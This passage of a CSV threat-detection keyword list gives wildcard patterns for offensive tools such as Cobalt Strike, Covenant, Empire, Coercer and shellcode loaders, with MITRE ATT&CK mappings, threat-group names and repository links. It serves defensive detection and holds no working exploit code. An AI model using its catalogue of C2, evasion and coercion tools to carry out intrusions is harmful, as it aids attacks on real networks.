APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*cobaltstrike-*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*cobalt-strike*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*-cobaltstrike*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*cobaltstrike.*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*CobaltStrike.LJ!MTB*","signature_keyword","Antivirus Signature","windows defender antivirus signature for UAC bypass","N/A","N/A","N/A","N/A","C2","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*cobaltstrike.store*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" +"*cobaltstrike/*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*cobaltstrike_*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*cobaltstrike-dist.tgz*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" +"*cobbr/Covenant*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*cobbr/Elite*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*cobbr/PSAmsi*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"*cocfojppfigjeefejbpfmedgjbpchcng*","greyware_tool_keyword","SaferVPN Proxy","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*code.exe tunnel --accept-server-license-terms --name *","greyware_tool_keyword","vscode","Starts a reverse connection over global.rel.tunnels.api.visualstudio.com via websockets","T1090.003 - T1059.001 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://badoption.eu/blog/2023/01/31/code_c2.html","1","0","risk of False positive","10","10","N/A","N/A","N/A","N/A" +"*code_execution/*.dll*","offensive_tool_keyword","empire","Empire dll paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1075","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*code_execution/*.exe*","offensive_tool_keyword","empire","Empire executable paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1135","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*code_execution/*.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1136","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*CodeExec-D37DA402-3829-492F-90D0-8EC3909514EB.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" +"*CodeLoad(shellcode)*","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Axx8/ShellCode_Loader","1","0","N/A","10","10","389","49","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z" +"*codeload.github.com/*","greyware_tool_keyword","github","Github executables download initiated - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*codeLoader/codeLoader.*","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","10","10","555","105","2023-08-26T12:48:08Z","2021-01-19T15:57:01Z" +"*codewatchorg/bypasswaf*","offensive_tool_keyword","bypasswaf","Add headers to all Burp requests to bypass some WAF products","T1090 - T1189 - T1001","TA0002 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/bypasswaf","1","1","N/A","N/A","4","323","117","2018-01-28T13:13:39Z","2014-11-17T01:29:35Z" +"*codewatchorg/sqlipy*","offensive_tool_keyword","sqlipy","SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.","T1190 - T1210 - T1574","TA0002 - TA0040 - TA0043","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/sqlipy","1","1","N/A","N/A","3","247","102","2023-05-08T18:50:41Z","2014-09-22T03:25:42Z" +"*codewhitesec/apollon*","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","1","N/A","8","1","13","5","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z" +"*codewhitesec/daphne*","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","1","N/A","8","1","12","2","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z" +"*Coercer coerce*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*coercer -d * -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*Coercer fuzz*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*Coercer scan*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*coercer.core*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*coercer.methods*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*coercer.models*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*coercer.network*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*Coercer.py *","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*coercer.structures*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*coercer/core/loader*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*coercer_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*coff_definitions.h*","offensive_tool_keyword","cobaltstrike","Load and execute COFF files and Cobalt Strike BOFs in-memory","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/COFFLoader2","1","1","N/A","10","10","156","40","2022-09-13T14:58:30Z","2021-12-14T07:49:17Z" +"*COFF_Loader.*","offensive_tool_keyword","cobaltstrike","Load and execute COFF files and Cobalt Strike BOFs in-memory","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/COFFLoader2","1","1","N/A","10","10","156","40","2022-09-13T14:58:30Z","2021-12-14T07:49:17Z" +"*COFF_PREP_BEACON*","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - 